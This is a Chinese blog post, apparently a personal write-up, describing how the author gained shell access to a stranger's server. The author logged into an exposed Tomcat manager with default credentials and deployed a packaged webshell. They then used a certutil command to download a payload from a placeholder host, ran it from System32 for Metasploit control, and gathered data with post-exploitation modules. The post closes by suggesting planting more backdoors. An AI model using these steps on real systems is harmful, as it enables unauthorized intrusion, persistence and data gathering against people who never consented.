UzzzzZ

2023-10-20 16:01:45 浏览数 (1)

浅析:TomCat Getshell拿服务器权限实战

0xOO前言

无意中接触到一个网站 所以索性尝试一下

没什么技术性 都是一些基本操作 大佬看看就可以了奥

注:由于保密问题 所有关于对方信息网址等各项信息都将保密打上马赛克 能打的都打上马赛克

0x00

tomcat默认有个manager的管理后台app,密码存放在conf/tomcat-users.xml里面。如果tomcat是外网开放的,那么这个manager服务也是开放的,http://主机:端口/manager/html 可以看看是不是通的

0x01

首先我尝试一下默认账号admin 密码为空 发现可以进去 那真是太好了

登录进去之后

可以看到有一个上传war部署项目的

那么就用IDEA 打包一个webshell大马 部署进去即可

首先需要一个自备的webshell大马

随便找一个

然后打开IDEA创建一个项目

一直Next即可

然后把webshell拷贝到scr目录

选择Project Structure

选择Artifacts 然后再选择web Application: Archive

打勾include in project build 然后点击 号选择module Output

选择项目即可

然后选择build

选择build Artifacts

完事之后呢

上传部署即可

点击Deploy之后就可以看到

多了一个xssx

那么访问那个目录即可

命令执行 ipconfig

可以看到内网 192.168.0.128

Net user

0x02

权限移交MetaSploit(Msf)

尝试使用shellcode制作payload

编译后利用webshell上传到服务器

有最快捷的方法把payload上传到服务器( 记得一定要内网穿透哦 )

  1. 第一种就是使用CMD的命令certutil(然后使用CMD命令运行即可)

命令:certutil -urlcache -split -f https://www.xxx.com/test.EXE

2.第二种就是使用webshell的上传(同理,使用CMD命令运行PAYLOAD)

首先使用webshell来到服务器的C:\Windows\System32\目录下,然后uploadfile

Jie.exe就是我们上传的payload

那么直接使用CMD命令运行(命令:start C:WindowsSystem32jie.exe)

内网的IP为192.168.0.128

0x03

信息收集

1.查看路由

2.查看系统信息

3.进入CMD命令行 然后Net User查看用户

4.调用post/windows/gather/dumplinks 来查看最近访问的文件

5.调用post/windows/gather/enum_applications 来查看目标主机安装软件的信息

然后可以选择多放几个后门 或者 提交漏洞!

请在国庆期间做一个好人

0 人点赞